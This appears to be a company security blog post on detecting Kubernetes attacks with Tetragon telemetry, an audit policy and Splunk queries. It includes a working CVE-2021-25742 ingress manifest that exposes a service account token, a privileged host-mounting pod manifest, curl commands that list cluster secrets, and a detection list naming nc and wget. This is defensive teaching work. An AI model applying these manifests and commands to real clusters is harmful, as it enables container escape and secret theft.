Threat Detection in the K8s Environment

Published in

Exness Tech Blog

16 min readJul 4, 2024

In today’s digital landscape, securing data and applications is crucial for organizations of all sizes, especially with technologies like Kubernetes (K8s) transforming application development, deployment, and scalability.

Kubernetes is a popular open-source container management system that automates the deployment, scaling, and management of containerized applications. While it offers flexibility, scalability, and reliability, it also introduces new security challenges. Protecting business-critical applications and sensitive data in Kubernetes is essential for the Blue Team, as attackers increasingly target K8s environments. Threat Intelligence reports detail attacker tactics, and the security community develops new tools and guidelines, such as CIS Kubernetes Benchmarks, to enhance K8s security.

In this article, the Exness SOC (Security Operations Center) team shares our approaches to monitoring and detecting threats in the K8s environment. We discuss the tools and event types we use to detect malicious activity on our clusters and provide examples of detection rules that might be useful for adversary detection.

Our weapons

Endpoint Agent

There are many open-source and commercial agent security solutions for monitoring your Kubernetes environment. After a long period of testing various solutions, we chose the open-source Tetragon tool.

As with almost every security tool, Tetragon has advantages and drawbacks that you should know while planning your monitoring strategy.

Here are its main advantages:

Power of eBPF: eBPF programs run in kernel context, providing efficient access to system parts and handling kernel events with minimal latency. They can also receive telemetry from containers in Kubernetes clusters.
Open Source: Tetragon, being open source, allows adding features, enriching events, and hooking on syscalls to detect advanced adversary techniques.
Community Contribution: The security community actively improves Tetragon, enhancing stability, fixing bugs, and adding functionality.
Raw Telemetry Collection: Unlike solutions like Falco that rely on predefined rules, Tetragon collects raw telemetry, enabling coverage of new threats, retrospective analysis, threat hunting, and security investigations.
Universal Monitoring Agent: Tetragon is also effective for monitoring activity on regular Linux hosts outside Kubernetes clusters.

But there are also drawbacks you should be aware of in advance:

Open Source: You need a dedicated team to enhance features, fix bugs, and maintain updates across multiple Nix hosts.

Lack of Cutting-edge Features: Unlike commercial solutions, Tetragon lacks AI and Threat Intelligence features. However, you can develop these yourself.

Lack of Prevention: Tetragon doesn’t terminate malicious processes, quarantine files, or block C2 connections, requiring investment in R&D to add these features.

Lack of Response: Tetragon lacks incident response features like host isolation, remote shell, and forensic artifacts collection.

Telemetry Overload: Collecting raw telemetry generates massive data, requiring processing in your SIEM and potentially causing performance issues on source hosts.

At Exness, we enhanced Tetragon with the following features:

Binary Hash Calculation: Useful for checking IoCs presence in infrastructure.
Container Event Enrichment: Docker-inspected information is added to every container’s event, extending detection coverage and providing more context during investigations and incident response.
User Enrichment: We enriched every event with additional user information, such as the user’s home folder, shell, etc.
Agent-side Events Filtering: Events are filtered on the agent side to save the host’s performance, significantly reduce collected event flow, and control SIEM costs.

Soon, we plan to open-source our Tetragon fork to share it with the community.

Kubernetes Audit

The endpoint agent provides great visibility, but how can we monitor all the activity inside containers in K8s clusters?

We need to detect threats at the Kubernetes level and understand who launched a service or application, under which role, and from where.

Here a built-in function comes to aid, Kubernetes Audit log. Most of the actions in the K8s cluster are carried out through the “kube-api-server” component. Kubernetes allows users to implement an audit policy and granularly log calls to specific resources, select only certain methods, and apply many other filters. Of course, you can collect all events, but by default, this source generates an incredible number of events. To address this issue, we use a custom Kubernetes Audit Policy with the following parameters:

apiVersion: audit.k8s.io/v1
kind: Policy
omitStages:
  - "RequestReceived"
rules:

  # Excluding all activity related to the lease resource, as it is not required for attack detection and incident investigation.
  # The use of Lease in Kubernetes allows for the implementation of efficient and reliable leader election mechanisms and coordination between application instances.
  - level: None
    resources:
      - group: "coordination.k8s.io"
        resources: ["leases"]
  
  # We are discarding events from the kube-proxy account that request data about the "endpoints" and "services" resources.
  - level: None
    users: ["system:kube-proxy"]
    verbs: ["watch"]
    resources:
      - group: ""
        resources: ["endpoints", "services"]

  # We are discarding activity events from the kube-controller-manager, kube-scheduler, and kube-systemservices related to performing "get" and "update" operations on the "endpoints" resource in the kube-system namespace.
  - level: None
    users:
      - system:kube-controller-manager
      - system:kube-scheduler
      - system:serviceaccount:kube-system:endpoint-controller
    verbs: ["get", "update"]
    namespaces: ["kube-system"]
    resources:
      - group: ""
        resources: ["endpoints"]

  # Omit apiserver account events with the "get" action with the "namespace" resource.
  - level: None
    users: ["system:apiserver"]
    verbs: ["get"]
    resources:
      - group: ""
        resources: ["namespaces"]

  # Don't log authenticated requests to certain non-resource URL paths
  - level: None
    userGroups: ["system:authenticated"]
    nonResourceURLs:
      - "/api*"
      - "/version"
      - "/healthz*"
      - "/metrics*"

  # Don't log subjectaccessreviews from metrics-server, system:nodes
  - level: None
    users: ["system:serviceaccount:kube-system:metrics-server", "system:node"]
    resources:
      - group: "authorization.k8s.io"
        resources: ["subjectaccessreviews", "selfsubjectaccessreviews"]

  # Secrets and Config Maps on the Metadata level
  - level: Metadata
    resources:
      - group: ""
        resources: ["secrets", "configmaps"]
      - group: authentication.k8s.io
        resources: ["tokenreviews"]


  # Omit other events:
  - level: None
    resources:
      - group: ""
        resources: ["events"]
      - group: "events.k8s.io"
        resources: ["events"]

  # Read operations on the Metadata level
  - level: Metadata
    verbs: ["get", "list", "watch"]
    resources:
      - group: ""
      - group: "apps"
      - group: "batch"
      - group: "certificates.k8s.io"
      - group: "rbac.authorization.k8s.io"
      - group: "admissionregistration.k8s.io"
      - group: "authorization.k8s.io"

  # Log RequestResponse for can-i events:
  - level: RequestResponse
    resources:
      - group: "authorization.k8s.io"
        resources: ["selfsubjectaccessreviews", "selfsubjectrulesreviews"]

  # Log RequestResponse for RBAC modifications events
  - level: RequestResponse
    resources:
      - group: "rbac.authorization.k8s.io"
        resources: ["clusterrolebindings", "clusterroles", "rolebindings", "roles"]

  # Main rule for crucial resources:
  - level: Request
    resources:
      - group: ""
        resources: ["limitranges", "namespaces", "nodes", "persistentvolumeclaims", "persistentvolumes", "podtemplates", "resourcequotas", "serviceaccounts", "pods", "pods/exec", "pods/attach", "pods/ephemeralcontainers"]
      - group: "apps"
        resources: ["daemonsets", "deployments", "replicasets", "statefulsets"]
      - group: "batch"
        resources: ["jobs"]
      - group: "certificates.k8s.io"
        resource: ["certificatesigningrequests"]
      - group: "admissionregistration.k8s.io"
        resource: ["mutatingwebhookconfigurations", "validatingwebhookconfigurations"]
      - group: "authorization.k8s.io"

 # Default level for all other requests.
  - level: Metadata

You can use this policy to filter out the activity of various “noisy” services. On the contrary, you may log events you are interested in.

Now that we have briefly described telemetry sources and tools for the K8s environment, we can move on to the funniest part: threat detection!

CES (Common Event Schema)
To efficiently search in SIEM across all event sources, we use CES (Common Event Schema). CES abstracts “raw” events and fields from various sources, mapping them into a common format. This process, though challenging, is a valuable long-term investment that increases SOC efficiency.
For example, if you have the IP address of a C2 server, CES allows you to search for all connections to this IP across different infrastructure components without remembering all raw field names. Similarly, to check account activity, CES simplifies searching across multiple event sources with a common “user name” field.
Using CES, you can create concise searches like “index=* src_ip=<C2 address>” or “index=* user_name=<Malicious user name>,” streamlining detection and investigation. All threat detection rules in this article will use our intuitive CES. Now, let’s look at threat detection!

Threat Detection

System binary renaming

MITRE: T1036.003
MS K8s Matrix: -
Event source: Tetragon

Consider the activity of the TeamTNT group, known for attacking virtual and cloud infrastructures. They scan external subnets for poorly configured or vulnerable services, exploit them, and deploy malicious payloads. A Cado Security report describes how TeamTNT exploited misconfigured Docker hosts. Similarly, a Kubernetes master node with anonymous access exposed to the Internet could be compromised. TeamTNT gained unauthorized access to the Docker daemon and launched their container.

a script fragment executed within the deployed container

The attacker tried to find and rename system utilities to evade signature-based detection.

Let's emulate this activity. We have created a new “alpine-shell” Pod with the “alpine” image and renamed the Wget system tool inside the container.

For detection, we can use the following query:

index=tetragon event{}="FileRename"
(
  file_path_old IN ("/usr/bin/*","/bin/*","/usr/sbin/*","/sbin/*") OR
  (proc_cwd IN ("/usr/bin*","/bin*","/usr/sbin*","/sbin*") AND NOT file_path_old="*/*") OR
  file_path_old IN (
    "*/mkdir",
    "*/wget",
    "*/nc",
    "*/netcat",
    "*/cd",
    "*/chmod",
    "*/curl",
    "*/ps",
    "*/ls",
    "*/netstat",
    "*/kill",
    "*/pkill",
    "*/rm",
    "*/cat",
    "*/vim",
    "*/ssh",
    "*/chattr",
    "*/chmod",
    "*/iptables"
  )
)

file_path_old IN (“/usr/bin/*”,”/bin/*”,”/usr/sbin/*”,”/sbin/*”) searches for file renaming events in the /usr/bin/, /bin/, /usr/sbin/, /sbin/ directories.
proc_cwd IN (“/usr/bin*”,”/bin*”,”/usr/sbin*”,”/sbin*”) AND NOT file_path_old=”*/*” The Tetragon agent has a specific feature where, when a renaming operation is performed from within the directory containing the file, the file_path_old field will only contain the renamed file’s name instead of its full path. We can use the proc_cwd field, which indicates the current working directory of the running process.
file_path_old IN (“*mkdir”,”*wget”, …) covers scenarios where an attacker has downloaded a LOLBin utility to any non-system directory and tries to rename it.

As a result of the search, we can observe the event:

{
   agent_uid: test-c08d3638e4a009872977a60f1909663b
   cmdline: /usr/bin/wget /usr/bin/evil_wget
   container_bind: [
     /var/lib/kubelet/pods/b465922b-ef22-4478-971a-27b00d15407d/volumes/kubernetes.io~secret/default-token-9v29s:/var/run/secrets/kubernetes.io/serviceaccount:ro
     /var/lib/kubelet/pods/b465922b-ef22-4478-971a-27b00d15407d/etc-hosts:/etc/hosts
     /var/lib/kubelet/pods/b465922b-ef22-4478-971a-27b00d15407d/containers/alpine-shell/d0155c82:/dev/termination-log
   ]
   container_create_time: 2024-04-18T14:27:23.15949393Z
   container_img_name: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
   container_is_privileged: false
   container_is_rofs: false
   container_name: alpine-shell
   container_namespace_cgroup: host
   container_namespace_ipc: container:c2892b77577af3610321a2e23bdb55b4146fb227a9d1dc788b2f8d9691424656
   container_namespace_net: container:c2892b77577af3610321a2e23bdb55b4146fb227a9d1dc788b2f8d9691424656
   container_uid: 0ecd3f994d2b3a4fdde23670033666cad96a3fafb98a96bb803c7b0289ff372e
   event: [
     FileRename
   ]
   event_description: Tetragon __x64_sys_renameat2 event.
   event_type: __x64_sys_renameat2
   event_utc_time: 2024-04-18T14:27:34.023246451Z
   file_path: /usr/bin/evil_wget
   file_path_old: /usr/bin/wget
   host_ip: 10.130.8.242
   host_name: itesc-testebpf-k8s-01.test.env
   k8s_namespace: default
   k8s_pod_name: alpine-shell
   proc_cap: [
     CAP_CHOWN
     DAC_OVERRIDE
     CAP_FOWNER
     CAP_FSETID
     CAP_KILL
     CAP_SETGID
     CAP_SETUID
     CAP_SETPCAP
     CAP_NET_BIND_SERVICE
     CAP_NET_RAW
     CAP_SYS_CHROOT
     CAP_MKNOD
     CAP_AUDIT_WRITE
     CAP_SETFCAP
   ]
   proc_cwd: /
   proc_file_name: mv
   proc_file_path: /bin/mv
   proc_flags: execve rootcwd clone
   proc_gp_uid: OjExMjMyNjkyNTAyNDY2MToxMDgy
   proc_id: 1363
   proc_p_auid: 4294967295
   proc_p_cwd: /
   proc_p_file_md5: ffe99296d0d826a4b27cc8812403965a
   proc_p_file_name: sh
   proc_p_file_path: /bin/sh
   proc_p_flags: execve rootcwd clone
   proc_p_id: 1104
   proc_p_user_cwd: /root
   proc_p_user_gid: 0
   proc_p_user_name: root
   proc_p_user_uid: 0
   proc_p_start_time: 2024-04-18T14:27:23.288875447Z
   proc_p_uid: OjExMjMyNzAwNDcyOTI3OToxMTA0
   proc_start_time: 2024-04-18T14:27:34.023246664Z
   proc_uid: OjExMjMzNzczOTEwMDcxMzoxMzYz
   proc_user_auid: 4294967295
   proc_user_cwd: /root
   proc_user_gid: 0
   proc_user_name: root
   proc_user_uid: 0
}

The event contains a wealth of useful information, such as the name of the launched Pod (k8s_pod_name), K8s namespace (k8s_namespace), user-initiator of the activity (proc_user_*), process-related data (proc_*), details about the launched container (container_*) and more.

As a SOC Analyst, you might be interested in under which account this Pod was created. The answer can be easily obtained using Kube API events:

index=kube_api
action=create obj_tgt_type=Pod obj_tgt_name=alpine-shell

{
   action: create
   agent_uid: test-76064bc0c2c6faa4ef89dd3f2a0fb3ed
   event: [
     HTTPReq
   ]
   event_description: Kubernetes audit log. Raw input.
   event_result: allow
   event_type: ResponseComplete
   event_uid: 31f707f2-ddc5-4250-8408-ebd48b5bbf31
   event_utc_time: 2024-04-18T14:27:23.11944791Z
   host_ip: 10.130.8.244
   host_name: itesc-testebpf-k8s-03.test.env
   http_code: 201
   k8s_namespace: default
   k8s_pod_labels: {
     run: alpine-shell
   }
   obj_name: alpine-shell
   obj_tgt_name: alpine-shell
   obj_tgt_type: Pod
   obj_type: pods
   requestObject: {
     apiVersion: v1
     spec: {
       containers: [
         {
           container_args: [
             sh
           ]
           container_img_name: alpine
           container_name: alpine-shell
           imagePullPolicy: Always
           stdin: true
           stdinOnce: true
           terminationMessagePath: /dev/termination-log
           terminationMessagePolicy: File
           tty: true
         }
       ]
       dnsPolicy: ClusterFirst
       enableServiceLinks: true
       restartPolicy: Always
       schedulerName: default-scheduler
       terminationGracePeriodSeconds: 30
     }
   }
   src_ip: [
     10.130.8.242
   ]
   uri_path: /api/v1/namespaces/default/pods?fieldManager=kubectl-run
   user_client: kubectl/v1.24.3 (linux/amd64) kubernetes/aef86a9
   user_group: [
     system:masters
     system:authenticated
   ]
   user_name: kube-admin
}

A kube API event indicates that a pod named alpine-shell was created by the k8s user kube-admin with the IP address 10.130.8.242 (itesc-testebpf-k8s-01.test.env). In the requestObject field, we can see the full description of the created Pod, which can be useful for incident investigation. The event was generated on the master node itesc-testebpf-k8s-03.test.env (field host_name). Thus, we have gathered all the information we need to respond to the incident.

Thus, with Tetragon, most rules detecting malicious activity on the host also work well for containers.

Privileged container is detected

MITRE: T1068
MS K8s Matrix: MS-TA9018
Event source: Tetragon

Using privileged containers in Kubernetes clusters poses a significant security risk. These containers have elevated access to the host system, making them exploitable by attackers who can break out to the underlying OS. Attackers can also use privileged containers to evade detection and manipulate host resources.

Preventing such incidents is better than dealing with the aftermath. Mechanisms like Admission Controllers, Security Contexts for Pods, and developer security training can help. However, real-world implementation can be challenging, so additional monitoring is beneficial.

Here’s a query to detect a new privileged container:

index=tetragon
event{}="ProcessCreate"
container_uid=*
(
    container_is_privileged=true OR
    container_namespace_ipc=host OR
    container_namespace_net=host OR
    container_namespace_pid=host OR
    container_bind{}="/:*" OR
    container_dev{}.PathOnHost="/dev/sda*" OR
    proc_cap{}="CAP_SYS_ADMIN"
)
NOT (k8s_namespace=kube-system container_name IN (<priv_container_1>,priv_container_2,...))

Let’s have a closer look at the request conditions:

container_is_privileged=true — The container was launched with the “privileged” flag.
container_namespace_*=host — The running container has access to the host namespace, so an attacker can access the underlying operating system.
container_bind{}=”/:*” — This line describes a scenario where the attacker mounts the root of the host filesystem into the container, thus gaining access to all files.
container_dev{}.PathOnHost=”/dev/sda*” — The attacker mounts the host disk device inside the container, gaining access to the filesystem.
proc_cap{}=”CAP_SYS_ADMIN” — Process was launched with the “CAP_SYS_ADMIN” capabilities. Of course, other capabilities allow an attacker to escape from the container, such as CAP_SYS_PTRACE, CAP_SYS_CHROOT, etc., but they are often used for legitimate containers.
NOT (k8s_namespace=kube-system container_name IN (<priv_container_1,priv_container_2>,..)) — The kube-system namespace contains numerous system services that require elevated privileges and access to system resources. Therefore, we exclude the activity of containers operating in this namespace. It is better to explicitly specify a list of containers to exclude instead of excluding all kube-system namespace activity. Otherwise, malicious workloads created by an attacker may be missed.

Next, we will create a privileged Pod with the following manifest:

apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
spec:
  containers:
  - name: evil-container
    image: alpine
    command: ["wget", "https://pastebin.com/GizpPKtU"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: rootfs-volume
      mountPath: /hostfs
  volumes:
  - name: rootfs-volume
    hostPath:
      path: /

As a result, we get the event of a privileged container named “evil-container” creation:

In cases where an organization doesn’t closely monitor the configuration of exposed services and neglects common security practices, you can use this type of query as a hypothesis that should be periodically validated during threat-hunting exercises.

Suspicious execution activity inside a container

MITRE: T1611
MS K8s Matrix: MS-TA9006
Event source: Tetragon

Attackers inside a container can exploit configuration errors like:

Mounted Docker Socket: If insecure, attackers can connect to the socket, create a privileged container, and escape to the host system.
Privileged Account Kubeconfig in K8S Resource: With this file, attackers can access the Kubernetes API and create privileged resources, allowing an escape to the host system.

Attackers usually use existing clients like Docker or kubectl for these exploits. To detect such activity, use the following Splunk query:

index=tetragon
event{} IN (ProcessCreate,Connection)
(
    (proc_file_name=kubectl cmdline IN ("*create*pod*","*create*deployment*","*create*daemonset*","*create*statefulset*","*exec *","*run *")) OR
    (proc_file_name=docker cmdline IN ("*run *","*exec*"))
)
container_name=*

The discovered events indicate that within the evil-container container, the kubectl utility was executed to create a privileged Pod named evil-pod. Additionally, you can see that the network connection to the Kube API was initiated by kubectl:

The cluster-admin role is bound to the user

MITRE: T1098
MS K8s Matrix: MS-TA9019
Event source: Kube API audit

Let’s consider a scenario where an attacker fully compromises the cluster and decides to entrench themselves in the system by creating an additional privileged account. The new account will likely be bound to the ‘cluster-admin’ role immediately, which grants full control over the entire cluster environment and resources.

There are also situations where a new user is granted ‘cluster-admin’ privileges right away instead of dealing with RBAC's granular configuration. Excessive privileges pose a significant security risk.

The following search query may detect such activity:

index=kube_api obj_tgt_type=ClusterRoleBinding action="create" requestObject.roleRef.name="cluster-admin"
NOT (user_name="system:apiserver" requestObject.subjects{}.name="system:masters")

The search result is shown below:

The user kube-admin created a ClusterRoleBinding resource named anakin-cluster-admin and granted the service account anakin.skywalker the role of Kubernetes cluster administrator.

Suspicious workload creation in kube-system namespace

MITRE: T1610
MS K8s Matrix: MS-TA9008
Event source: Kube API audit

An attacker may attempt to mimic a legitimate service by adding a malicious workload to the kube-system namespace (having proper privileges for that). Using a behavior-based threat detection approach, we should filter out legitimate activity, leaving only anomalous events. Since every company uses its own Kubernetes services, your list of workload resources may differ.

Let’s create a search to detect this activity:

index=kube_api
action=create
k8s_namespace=kube-system
obj_type IN (daemonsets statefulsets deployments)
NOT obj_name IN (calico-kube-controllers,calico-node,coredns,kube-proxy,dns-autoscaler)
NOT requestObject.spec.template.spec.containers{}.container_img_name IN ("registry.k8s.io/coredns/coredns*","registry.k8s.io/kube-proxy*")

kubectl create deployment not-evil-service — image=alpine — namespace=kube-system creates a malicious deployment. Let’s find traces of this activity using the search query described earlier:

As a result, we can see that in the kube-system namespace, the user kube-admin created a Deployment named legitimate-application.

CVE-2021–25742

MITRE: T1068
MS K8s Matrix: -
Event source: Kube API audit

Vulnerability CVE-2021–25742 allows you, given an account with permissions to create ingress, to craft a malicious ingress resource and access the ‘system:serviceaccount:ingress-nginx:ingress-nginx’ service account token. This account, in turn, grants access to all secrets across the cluster. More details about this vulnerability can be found here.

To create the malicious ingress, we will use manifest:

apiVersion: v1
kind: Service
metadata:
  name: evil-ingress-service
spec:
  type: ExternalName
  externalName: kubernetes.default
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: evil-ingress
  annotations:
    nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
    nginx.ingress.kubernetes.io/server-snippet: |
      set_by_lua $token '
        local file = io.open("/run/secrets/kubernetes.io/serviceaccount/token")
        if not file then return nil end
        local content = file:read "*a"
        file:close()
        return content
      ';
 
      location = /token {
        content_by_lua_block {
          ngx.say(ngx.var.token)
        }
      }
spec:
  rules:
    - host: asgard.host
      http:
        paths:
          - backend:
              service:
                name: evil-ingress-service
                port:
                  number: 443
            path: /
            pathType: Prefix

The process of obtaining the nginx account token using the evil-ingress resource:

As you can see, the ingress-nginx service account token was successfully obtained after successfully creating the' evil-ingress' resource.

The vulnerability exploitation can be detected with the following search:

index=kube_api action=create obj_tgt_type=Ingress ("serviceaccount/token" AND "io.open")

The creation of a malicious ingress resource was detected. We recommend checking the relevance of updating your clusters (even though the vulnerability is old). If updating your cluster to the latest version is impossible, you can add the necessary settings to your Admission Controller settings.

Privilege discovery by service account

MITRE: T1069
MS K8s Matrix: MS-TA9029
Event source: Kube API audit

Let’s continue with our previous scenario and consider the attacker’s actions after obtaining service account token access. Before taking the next step, an attacker needs to discover their permissions. To do so, they can directly query the API or use the ‘auth can-i’ function of the kubectl utility that interacts with the same API.

For example, the attacker tries to determine if the ingress-nginx service account has “watch” permissions for all secrets in the cluster. The following command can be used for this:

curl -k -H "Authorization: Bearer <SERVICE_ACCOUNT_SECRET_TOKEN>" -H "Content-Type: application/json" -X POST -d '{"kind":"SelfSubjectAccessReview","apiVersion":"authorization.k8s.io/v1","spec":{"resourceAttributes":{"verb":"list","resource":"secrets"}}}' https://10.130.8.242:6443/apis/authorization.k8s.io/v1/selfsubjectaccessreviews

The response from the Kube API server tells us that the ingress-nginx account has the appropriate permissions.

Having these permissions, an attacker will take advantage of them. Since they don’t have GET permissions, they cannot directly retrieve the contents of a specific secret. But thanks to the list method, an attacker can request all secrets stored in the default namespace (and any other namespaces). The following command is used for this:

curl -k -H "Authorization: Bearer <SERVICE_ACCOUNT_SECRET_TOKEN>" https://10.130.8.242:6443/api/v1/namespaces/default/secrets

The response from the Kube API shows the contents of the variables in the default namespace.

It was not a good idea to store our secrets in this cluster

This search will show us current privileges discovery activity under service accounts:

index=kube_api user_name="system:serviceaccount:*" obj_type IN ("selfsubjectrulesreviews","selfsubjectaccessreviews")

Depending on the technology stack you use, such activity may be normal for some service accounts. Let’s search for the events:

As a result, suspicious discovery activity on the ingress-nginx service account was detected.

Suspicious discovery activity

MITRE: T1613
MS K8s Matrix: MS-TA9029
Event source: Kube API audit

Continuing the previous compromise scenario of an account, let’s consider a case where the attacker performs reconnaissance of the current environment and permissions but now uses automation tools or direct access to Kubernetes objects (kubectl get). Most often, a compromised account does not have administrative privileges in the cluster (if it does, then setting your LinkedIn account status to “OpenToWork” may be the best Incident Response activity). Therefore, as part of the discovery activity, you may observe requests for resources that are prohibited for the current user.

For example, there is a service account called unicorn-sa, located in the unicorn-land namespace. The account has permissions only to read secrets within the same namespace.

You may imagine an attacker gaining access to GitLab, where a token for the unicorn-sa account is stored in one of the projects. The attacker's next step is conducting a reconnaissance of the cluster environment. For instance, using the KubiScan utility, the attacker can obtain a ready-made list of risky RoleBindings, Roles, etc. The malicious actor can exploit misconfigurations in security settings and gain higher privileges with this information.

Here’s an example query displaying the result if an account created more than five requests to resources it is not allowed to access:

index=kube_api event_reason=Forbidden
| stats earliest(event_utc_time) AS event_utc_time
  values(host_name) AS host_name
  values(http_code) AS http_code
  values(action) AS action
  values(user_client) AS user_client
  values(src_ip{}) AS src_ip{}
  values(obj_type) AS obj_type
  count by user_name
| where count > 5

Now, we can see the following event:

The service account unicorn-sa requested a list of clusterroles, pods, rolebindings, and roles objects. There are cases where some monitoring services access cluster resources to retrieve metrics. As a result, we may get false positives. To make the rule more accurate, we can explicitly specify a list of resources that interest attackers the most, for example — obj_type IN (deployments,secrets,pods,…).

Conclusion

With Kubernetes’ growing popularity, securing its infrastructure is increasingly important as it becomes a prime target for attackers. Critical business applications in Kubernetes environments heighten hackers’ motivation.

We described how we monitor Kubernetes clusters to detect various adversary techniques and believe sharing knowledge among defenders is crucial. We also showed, through examples, how to detect threats in K8S environments. Knowing your infrastructure well improves threat response and mitigates business risks.

Thank you for your attention. We will continue sharing our knowledge and experience with the community.